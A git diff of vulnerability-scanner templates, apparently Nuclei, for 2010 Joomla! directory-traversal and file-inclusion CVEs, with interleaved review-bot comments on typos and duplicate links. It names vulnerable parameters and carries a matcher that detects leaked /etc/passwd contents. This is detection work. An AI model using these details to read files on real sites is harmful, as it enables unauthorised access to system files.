@@ -4,10 +4,14 @@ info: name: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12088 - https://www.cvedetails.com/cve/CVE-2010-1979 + - http://secunia.com/advisories/39360 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1979 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-1980.yaml b/cves/2010/CVE-2010-1980.yaml index 37219a9e71..c251891840 100644 --- a/cves/2010/CVE-2010-1980.yaml +++ b/cves/2010/CVE-2010-1980.yaml 
@@ -4,10 +4,15 @@ info: name: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12085 - https://www.cvedetails.com/cve/CVE-2010-1980 + - http://packetstormsecurity.org/1004-exploits/joomlaflickr-lfi.txt + - http://www.exploit-db.com/exploits/12085 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1980 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-1981.yaml b/cves/2010/CVE-2010-1981.yaml index bb141c636c..00c934810c 100644 --- a/cves/2010/CVE-2010-1981.yaml +++ b/cves/2010/CVE-2010-1981.yaml 
@@ -4,10 +4,15 @@ info: name: Joomla! Component Fabrik 2.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12087 - https://www.cvedetails.com/cve/CVE-2010-1981 + - http://packetstormsecurity.org/1004-exploits/joomlafabrik-lfi.txt + - http://www.exploit-db.com/exploits/12087 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1981 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-1982.yaml b/cves/2010/CVE-2010-1982.yaml index f58840909d..15283354c4 100644 --- a/cves/2010/CVE-2010-1982.yaml +++ b/cves/2010/CVE-2010-1982.yaml 
@@ -1,12 +1,18 @@ id: CVE-2010-1982 + info: name: Joomla! Component JA Voice 2.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + description: A directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12121 - https://www.cvedetails.com/cve/CVE-2010-1982 + - http://secunia.com/advisories/39202 + - http://www.securityfocus.com/bid/39343 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1982 tags: cve,cve2010,joomla,lfi requests: @@ -19,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-1983.yaml b/cves/2010/CVE-2010-1983.yaml index 2c169b3f5c..48292064e9 100644 --- a/cves/2010/CVE-2010-1983.yaml +++ b/cves/2010/CVE-2010-1983.yaml 
@@ -4,10 +4,15 @@ info: name: Joomla! Component redTWITTER 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php + description: A drectory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12055 - https://www.cvedetails.com/cve/CVE-2010-1983 + - http://packetstormsecurity.org/1004-exploits/joomlaredtwitter-lfi.txt + - http://www.exploit-db.com/exploits/12055 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1983 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2033.yaml b/cves/2010/CVE-2010-2033.yaml index 19eba6d68b..4e0eed3c3d 100644 --- a/cves/2010/CVE-2010-2033.yaml +++ b/cves/2010/CVE-2010-2033.yaml 
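Review bot: The rewritten description misspells its first word as `drectory`; the new line should read `description: A directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.` The trailing period the rewrite adds is fine to keep, since the other descriptions in this commit end with one.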
@@ -4,10 +4,15 @@ info: name: Joomla Percha Categories Tree 0.6 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html - https://www.cvedetails.com/cve/CVE-2010-2033 + - http://secunia.com/advisories/39873 + - http://www.securityfocus.com/bid/40244 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2033 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2034.yaml b/cves/2010/CVE-2010-2034.yaml index 4600c605a4..80fa7717b0 100644 --- a/cves/2010/CVE-2010-2034.yaml +++ b/cves/2010/CVE-2010-2034.yaml 
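Review bot: The rewritten description names the Percha Fields Attach component (`com_perchafieldsattach`, version 1.x) while the template's `name` is `Joomla Percha Categories Tree 0.6`, so the two metadata fields describe different products. The new description text is identical to the one added in the CVE-2010-2036 hunk (which is the Fields Attach template), which suggests a copy-paste rather than the CVE-2010-2033 advisory wording; the rewording here only changed the opening article, so the mismatch predates this commit, but the line is being touched anyway. Check the description against the CVE-2010-2033 record and the packetstorm reference already listed before landing, since this is the text users search on.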
@@ -4,10 +4,15 @@ info: name: Joomla! Component Percha Image Attach 1.1 - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/34003 - https://www.cvedetails.com/cve/CVE-2010-2034 + - http://packetstormsecurity.org/1005-exploits/joomlaperchaia-lfi.txt + - http://www.securityfocus.com/bid/40244 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2034 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2035.yaml b/cves/2010/CVE-2010-2035.yaml index d34c0bda56..25cefc0e1a 100644 --- a/cves/2010/CVE-2010-2035.yaml +++ b/cves/2010/CVE-2010-2035.yaml 
@@ -4,10 +4,15 @@ info: name: Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 Beta for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 Beta for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/34006 - https://www.cvedetails.com/cve/CVE-2010-2035 + - http://www.securityfocus.com/bid/40244 + - http://packetstormsecurity.org/1005-exploits/joomlaperchagl-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2035 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2036.yaml b/cves/2010/CVE-2010-2036.yaml index 9cbb501b85..26186a8afc 100644 --- a/cves/2010/CVE-2010-2036.yaml +++ b/cves/2010/CVE-2010-2036.yaml 
@@ -4,10 +4,15 @@ info: name: Joomla! Component Percha Fields Attach 1.0 - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/34004 - https://www.cvedetails.com/cve/CVE-2010-2036 + - http://packetstormsecurity.org/1005-exploits/joomlaperchafa-lfi.txt + - http://www.securityfocus.com/bid/40244 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2036 tags: cve,cve2010,lfi,joomla requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2037.yaml b/cves/2010/CVE-2010-2037.yaml index e3db0ee030..0ec135d12a 100644 --- a/cves/2010/CVE-2010-2037.yaml +++ b/cves/2010/CVE-2010-2037.yaml 
@@ -4,10 +4,15 @@ info: name: Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/34005 - https://www.cvedetails.com/cve/CVE-2010-2037 + - http://www.securityfocus.com/bid/40244 + - http://packetstormsecurity.org/1005-exploits/joomlaperchada-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2037 tags: cve,cve2010,lfi,joomla requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2045.yaml b/cves/2010/CVE-2010-2045.yaml index b40cfaab94..131b2df9e3 100644 --- a/cves/2010/CVE-2010-2045.yaml +++ b/cves/2010/CVE-2010-2045.yaml 
@@ -4,10 +4,14 @@ info: name: Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + description: A directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12595 - https://www.cvedetails.com/cve/CVE-2010-2045 + - http://packetstormsecurity.org/1005-exploits/joomlafdione-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2045 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2050.yaml b/cves/2010/CVE-2010-2050.yaml index 9aedcbfc20..2c6104b29d 100644 --- a/cves/2010/CVE-2010-2050.yaml +++ b/cves/2010/CVE-2010-2050.yaml 
@@ -4,10 +4,15 @@ info: name: Joomla! Component MS Comment 0.8.0b - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: | + description: A directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: - https://www.exploit-db.com/exploits/12611 - https://www.cvedetails.com/cve/CVE-2010-2050 + - http://www.securityfocus.com/bid/40185 + - http://packetstormsecurity.org/1005-exploits/joomlamscomment-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2050 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2122.yaml b/cves/2010/CVE-2010-2122.yaml index 78a3fb66d0..55fdfe4f10 100644 --- a/cves/2010/CVE-2010-2122.yaml +++ b/cves/2010/CVE-2010-2122.yaml 
@@ -1,13 +1,18 @@ id: CVE-2010-2122 info: - name: Joomla! Component simpledownload 0.9.5 - Local File Disclosure + name: Joomla! Component simpledownload <=0.9.5 - Arbitrary File Retrieval author: daffainfo severity: high - description: Directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to retrieve arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12623 - https://www.cvedetails.com/cve/CVE-2010-2122 + - https://www.exploit-db.com/exploits/12618 + - http://www.securityfocus.com/bid/40192 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2122 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2128.yaml b/cves/2010/CVE-2010-2128.yaml index cf019f95a3..1237eb6309 100644 --- a/cves/2010/CVE-2010-2128.yaml +++ b/cves/2010/CVE-2010-2128.yaml 
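Review bot: The rewrite changes the stated impact from `include and execute arbitrary local files` to `retrieve arbitrary files` and renames the template to `Arbitrary File Retrieval`, but the `tags` line left in context still says `lfi`, and the removed text appears to be the advisory wording that the other templates in this commit keep. If the downgrade to a read-only impact is deliberate, say so in the commit message and reconsider the tag; otherwise keeping `- Local File Inclusion` in the `name` and the original verb in the description keeps this template consistent with the rest of the cves/2010 set. The matcher change to `root:.*:0:0:` is unaffected either way.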
@@ -4,10 +4,15 @@ info: name: Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php. - reference: | + description: A directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php. + reference: - https://www.exploit-db.com/exploits/12607 - https://www.cvedetails.com/cve/CVE-2010-2128 + - http://secunia.com/advisories/39832 + - http://www.exploit-db.com/exploits/12607 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2128 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2259.yaml b/cves/2010/CVE-2010-2259.yaml index 0d38e58882..0d1cebd3bb 100644 --- a/cves/2010/CVE-2010-2259.yaml +++ b/cves/2010/CVE-2010-2259.yaml 
@@ -4,10 +4,15 @@ info: name: Joomla! Component com_bfsurvey - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/10946 - https://www.cvedetails.com/cve/CVE-2010-2259 + - http://secunia.com/advisories/37866 + - http://www.exploit-db.com/exploits/10946 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2259 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2307.yaml b/cves/2010/CVE-2010-2307.yaml index 108671e209..8ee4309fff 100644 --- a/cves/2010/CVE-2010-2307.yaml +++ b/cves/2010/CVE-2010-2307.yaml @@ -8,7 +8,12 @@ info: reference: - https://www.securityfocus.com/bid/40550/info - https://nvd.nist.gov/vuln/detail/CVE-2010-2307 - tags: cve,cve2010,iot,lfi + - http://www.osvdb.org/65249 + - https://www.exploit-db.com/exploits/12865 + remediation: Upgrade to a supported product version. + classification: + cve-id: CVE-2010-2307 + tags: cve,cve2010,iot,lfi,motorola requests: - method: GET @@ -19,8 +24,10 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2507.yaml b/cves/2010/CVE-2010-2507.yaml index 4ff7972b09..64b3ed8517 100644 --- a/cves/2010/CVE-2010-2507.yaml +++ b/cves/2010/CVE-2010-2507.yaml 
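Review bot: In the CVE-2010-2307 hunk, the new reference `http://www.osvdb.org/65249` points at OSVDB, which to my knowledge has been offline since 2016, so it sends readers to a dead host; prefer an archived copy or drop it in favour of the securityfocus and exploit-db entries already present. The CVE-2010-2507 hunk adds `http://osvdb.org/65674` with the same problem. The remediation text in the same CVE-2010-2307 hunk, `Upgrade to a supported product version.`, also differs from the `Upgrade to a supported version.` used by every other template in this commit; pick one form.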
@@ -4,10 +4,15 @@ info: name: Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: | + description: A directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + reference: - https://www.exploit-db.com/exploits/13981 - https://www.cvedetails.com/cve/CVE-2010-2507 + - http://osvdb.org/65674 + - http://secunia.com/advisories/40297 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2507 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2680.yaml b/cves/2010/CVE-2010-2680.yaml index fa1dc916da..c7d3043166 100644 --- a/cves/2010/CVE-2010-2680.yaml +++ b/cves/2010/CVE-2010-2680.yaml 
@@ -4,10 +4,15 @@ info: name: Joomla! Component jesectionfinder - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php. + description: A directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/14064 - https://www.cvedetails.com/cve/CVE-2010-2680 + - http://packetstormsecurity.org/1006-exploits/joomlajesectionfinder-lfi.txt + - http://www.securityfocus.com/bid/41163 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2680 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2682.yaml b/cves/2010/CVE-2010-2682.yaml index 180ce24bb8..c7397e6665 100644 --- a/cves/2010/CVE-2010-2682.yaml +++ b/cves/2010/CVE-2010-2682.yaml 
@@ -4,10 +4,15 @@ info: name: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/14017 - https://www.cvedetails.com/cve/CVE-2010-2682 + - http://packetstormsecurity.org/1004-exploits/joomlarealtyna-lfi.txt + - http://www.exploit-db.com/exploits/14017 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2682 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2857.yaml b/cves/2010/CVE-2010-2857.yaml index 1478adabab..8450d34103 100644 --- a/cves/2010/CVE-2010-2857.yaml +++ b/cves/2010/CVE-2010-2857.yaml 
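Review bot: The added reference `http://www.exploit-db.com/exploits/14017` duplicates the existing `https://www.exploit-db.com/exploits/14017` two lines above, so the list now carries the same advisory twice under different schemes. Drop the new http entry (the https one is already the canonical link). The same http/https duplication is introduced in several sibling templates in this commit (CVE-2010-2857, CVE-2010-3203, CVE-2010-3426, CVE-2010-4231, CVE-2010-4282, CVE-2010-4719) and should be cleaned up the same way.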
@@ -4,10 +4,15 @@ info: name: Joomla! Component Music Manager - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the cid parameter to album.html. - reference: | + description: A directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the cid parameter to album.html. + reference: - https://www.exploit-db.com/exploits/14274 - https://www.cvedetails.com/cve/CVE-2010-2857 + - http://www.securityfocus.com/bid/41485 + - http://www.exploit-db.com/exploits/14274 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2857 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2861.yaml b/cves/2010/CVE-2010-2861.yaml index 7f29024985..5b56103782 100644 --- a/cves/2010/CVE-2010-2861.yaml +++ b/cves/2010/CVE-2010-2861.yaml @@ -8,7 +8,13 @@ info: reference: - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861 - http://www.adobe.com/support/security/bulletins/apsb10-18.html - tags: cve,cve2010,coldfusion,lfi + - http://securityreason.com/securityalert/8148 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2861 + metadata: + shodan-query: http.component:"Adobe ColdFusion" + tags: cve,cve2010,coldfusion,lfi,adobe requests: - method: GET @@ -28,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2918.yaml b/cves/2010/CVE-2010-2918.yaml index b8ddd64eb5..7b5d84d7fa 100644 --- a/cves/2010/CVE-2010-2918.yaml 
+++ b/cves/2010/CVE-2010-2918.yaml @@ -4,10 +4,15 @@ info: name: Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion author: daffainfo severity: high - description: PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. + description: A PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. reference: - https://www.exploit-db.com/exploits/31708 - https://www.cvedetails.com/cve/CVE-2010-2918 + - http://www.securityfocus.com/bid/28942 + - https://www.exploit-db.com/exploits/14476 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2918 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2920.yaml b/cves/2010/CVE-2010-2920.yaml index 48974bc25f..67f0851855 100644 --- a/cves/2010/CVE-2010-2920.yaml +++ b/cves/2010/CVE-2010-2920.yaml 
@@ -4,10 +4,14 @@ info: name: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + description: A directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12120 - https://www.cvedetails.com/cve/CVE-2010-2920 + - http://www.vupen.com/english/advisories/2010/1844 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2920 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-3203.yaml b/cves/2010/CVE-2010-3203.yaml index 7f5245195e..17042d0b25 100644 --- a/cves/2010/CVE-2010-3203.yaml +++ b/cves/2010/CVE-2010-3203.yaml 
@@ -1,13 +1,18 @@ id: CVE-2010-3203 info: - name: Joomla! Component PicSell 1.0 - Local File Disclosure + name: Joomla! Component PicSell 1.0 - Arbitrary File Retrieval author: daffainfo severity: high - description: Directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php. - reference: | + description: A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php. + reference: - https://www.exploit-db.com/exploits/14845 - https://www.cvedetails.com/cve/CVE-2010-3203 + - http://secunia.com/advisories/41187 + - http://www.exploit-db.com/exploits/14845 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-3203 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-3426.yaml b/cves/2010/CVE-2010-3426.yaml index 9eece26cbd..9a7401132f 100644 --- 